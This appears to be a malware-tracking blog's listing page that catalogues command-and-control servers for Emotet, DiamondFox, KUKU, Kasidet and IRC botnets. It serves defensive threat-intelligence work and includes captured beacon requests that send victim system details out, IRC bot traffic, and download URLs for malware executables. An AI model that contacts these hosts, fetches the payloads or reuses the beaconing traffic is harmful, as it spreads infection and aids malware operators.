Category: Uncategorized

damcodes777.cc(HTTP Malware Hosted In Russian Federation Moscow Fast Serv Inc.)

Uncategorized

damcodes777.cc 86.105.227.124 URL hxxp://damcodes777.cc/b/connect/2 DATA : POST /b/connect/2 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0) Host: damcodes777.cc Content-Length: 51 Cache-Control: no-cache cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0 Hosting Infos : http://whois.domaintools.com/86.105.227.124

ptmr1.in(HTTP Botnet Hosted In France Roubaix Ovh Sas)

Uncategorized

DNS  Requests   Request                 Result ptmr1.in              94.23.104.199 HTTP Command  GET /~clientes/i/i.php?frevny=fQ90R444P&bf=KC-FC8&qryn l=855555&irefvba=f6557&hcqngvzr=5 Hosting infos: http://whois.domaintools.com/94.23.104.199

gigasbh.org(IRC Botnet Hosted In France Paris 1&1 Internet Ag)

Uncategorized

Domains Domain                    IP f.eastmoon.pl 148.81.111.101 s.richlab.pl 148.81.111.101 gigasbh.org 82.165.129.253 IRC Traffic >> NICK {USA-XPx86a}cwecttyo >> USER cwectty 7949 7840 :cwectty >> MODE {USA-XPx86a}cwecttyo +iwG >> JOIN #sp yap >> PING 422 MOTD << 332 {USA-XPx86a}cwecttyo #sp : << 333 {USA-XPx86a}cwecttyo #sp x 1436609273 >> PONG 422Read more...

197.85.182.110(Trojan Emotet hosted in South Africa Cape Town Mweb Connect (proprietary) Limited)

Uncategorized

Spawned process “cmd.exe” with commandline “/c C:/winclient.au3” (UID: 00009516-00001892) Autoit strings inside maybe this malware is also coded in autoit. Injected into “CCleaner.exe” at 2015-7-2.14:59:47.395 (UID: 00009516-00000996) Contacts very many different hosts “197.85.182.110:8080” “162.144.35.78:8080” “158.255.238.209:8080” “198.1.122.176:8080” “119.59.124.163:8080” “200.159.128.132:8080” “88.208.228.111:8080” “162.144.88.73:8080” “103.245.153.70:8080” “103.228.200.37:8080” POSTs files to a webserver “POST /b215de35/f5665861/ HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (compatible;Read more...

upd.upd4ter.com(malware hosted in Spain Madrid Propelin Consulting S.l.u.)

Uncategorized

Contacts domains upd.upd4ter.com Contacts server 93.189.33.108:80 In general it steals passwords from browsers and get’s all the informations from the infected machines. GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version=1.1.9.15182&user_registry=0&user_id=&user_hdd=&user_hdd_volume=&user_mac=&user_mb=&user_bios=&user_os=6.1&user_os_arch=&user_cpu=&user_win_identifier=&process_parent=&user_browsers=&user_default_browser=&user_date=&user_vm=&user_antivirus=s)%20Available.&user_dotnet=&channel=&partner=&aff_id= HTTP/1.1 User-Agent: NSIS_ToolkitOffers (Mozilla) Host: upd.upd4ter.com Cache-Control: no-cache” Sample here Hosting infos http://whois.domaintools.com/93.189.33.108

Gorynych/DiamondFox (hosted in Hungary Budapest Doclerweb Kft)

Uncategorized

Thanks to Xylitol for panels and executables. Panels : hxxp://computergraphics.in/ hxxp://my-right.fr/ hxxp://bntnl.com/ Files : PO_37263_pdf.com > bntnl.com/Diamond/Panel/post.php?pl=&slots=1 HTTP/1.1 Xylitol posted a vid with the vulnerability of the Panel. Now the ruski behind this shit updated the panel. Hosting infos : http://whois.domaintools.com/80.77.123.90

KUKU v4.08 beta(Malware hosted in Germany Dortmund 1&1 Internet Ag)

Uncategorized

Another version from this malware some domains changed. makemegood24.com 213.165.83.176 1453eea.makemegood24.com 74.208.153.9 aaakemegood24.com 146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com 50.21.181.152 acakemegood24.com 74.208.164.166 adakemegood24.com 74.208.153.9 aeakemegood24.com 87.106.20.192 afakemegood24.com perfectchoice1.com 193.166.255.171 1459e2b.perfectchoice1.com 193.166.255.171 All hosts 74.208.164.166 87.106.253.18 54.210.47.225 166.78.106.200 87.106.20.192 213.165.83.176 87.106.250.34 193.166.255.171 URL’S http://1453eea.makemegood24.com/?1453eea=21315306&id=212331279066 GET /?1453eea=21315306&id=212331279066 HTTP/1.1 User-Agent: KUKU v4.08 beta =212331279066 Host: 1453eea.makemegood24.com Cache-Control: no-cache http://perfectchoice1.com/?1459c9a=21339290&id=212331279066 GETRead more...

gohome.cathosting.ninja(IRC botnet hosted in Netherlands Roosendaal Nforce Entertainment B.v.)

Uncategorized

Thanks to the anonymous guy  who send me the executable. Domains used from the botnet to connect to the server : gohome.cathosting.ninja IRC connection : 188.209.49.76:6667 Files downloaded from the botnet : URL: hxxp://sunnyamk.com/biox.exe URL: hxxp://sunnyamk.com/11111111111111111111111111111111111111111.exe URL: hxxp://sunnyamk.com/qVQLzrpnA7D1X3KwCPse4y00hP6aHIXyiQiyyhlX.exe All Domains : Domain Address Country www.sunnyamk.com 188.209.49.76 Romania sunnyamk.com 188.209.49.76 Romania gohome.cathosting.ninja 188.209.49.76 Romania Samples here.Read more...

jdsiwiqweiqwyreqwi.com (Kasidet aka Neutrino bot)

Uncategorized

Thnx to Xylitol for the name of the bot. Contacts domains details     “34324325kgkgfkgf.com”     “dsffdsk323721372131.com”     “fdshjfsh324332432.com”     “jdsiwiqweiqwyreqwi.com” Runs shell commands details     “cmd /c C:UsersPSPUBWSAppDataLocalTemp243765.bat” “C:38650f5c2beb183eaaba236d1b576c255a9be49af34db85705bed16d23ea11” on 2015-6-6.13:57:14.679 Dropped files details     “UserInfo.dll” has type “PE32 executable (DLL) (GUI) Intel 80386, for MS Windows”    Read more...